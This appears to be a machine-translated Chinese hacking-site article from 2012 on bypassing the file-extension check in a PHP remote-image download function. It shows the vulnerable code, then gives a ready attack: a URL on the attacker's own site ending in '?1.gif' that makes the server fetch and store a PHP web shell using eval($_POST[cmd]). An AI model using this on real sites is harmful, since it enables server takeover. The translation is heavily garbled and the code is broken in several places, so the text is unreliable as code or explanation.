A simple file extension authentication bypass techniques-vulnerability warning-the black bar safety net

ID MYHACK58:62201233649
Type myhack58
Reporter 佚名
Modified 2012-04-13T00:00:00


Mining the web application 0day the most effective and most direct way is directly from the file operation function to start with, my personal preference first took a fancy to pass the class code, The this article to a simple tips. Of course skill is not entirely original, is by learning someone else's tricks yourself think of all the purpose of this article is to make a Foundation, then to you the future of the mining process has inspired.

Function code:

function download( $content, $absurl = "", $basehref = "", $exts = "gif|jpg|jpeg|bmp|png" )


global $cfg;

$string = stripslashes( $content );

if ( ! preg_match_all( "/(href|src)=([\"|']?) ([^ \"'>]+\\. (".$ exts."))\\ 2/i", $string, $matches ) )


return $content;


$remotefileurls = array( );

//Here omitted several......

unset( $matches );

unset( $string );

$remotefileurls = array_unique( $remotefileurls );

$filepath = date( "Y/md/", $this->dateline );

$imgdir = $this->imgdir.$ filepath;

the include_once( ROOT."./ core/dir.func.php" );

dir_create( $imgdir );

foreach ( $remotefileurls as $k => $file )


$ext = fileext( $file );

$salt = rand( 1 0 0 0, 9 9 9 9 );

$filename = $this->dateline.$ salt.".".$ ext;

$newfile = $imgdir.$ filename;

if ( @copy( $file, $newfile ) )


$oldpath[$k] = $k;

$newpath[$k] = $imgurl.$ filename;

@chmod( $newfile, 5 1 1 );


//Here omitted several......


return str_replace( $oldpath, $newpath, $content );


This is an implementation of remote images automatically upload function, the user-submitted content if there are pictures of the address you will automatically Remote the address of the copy to the local! In the apparent content of the image path when using preg_match_all regex to match the Red part of the code, although there is extension of the validation but can easily be bypassed, we need only the shell of the address to modify is: http://www.mysite.com/shell.php?1.gif就可以绕过了, mysite is your website address, if their own website under the parse php, then the php content should be<? echo '<? eval($_POST[cmd]);?& gt;';?& gt; otherwise after the download to get the contents of the file is blank, copy remote file access, like IE, like access to after obtaining the parsed content.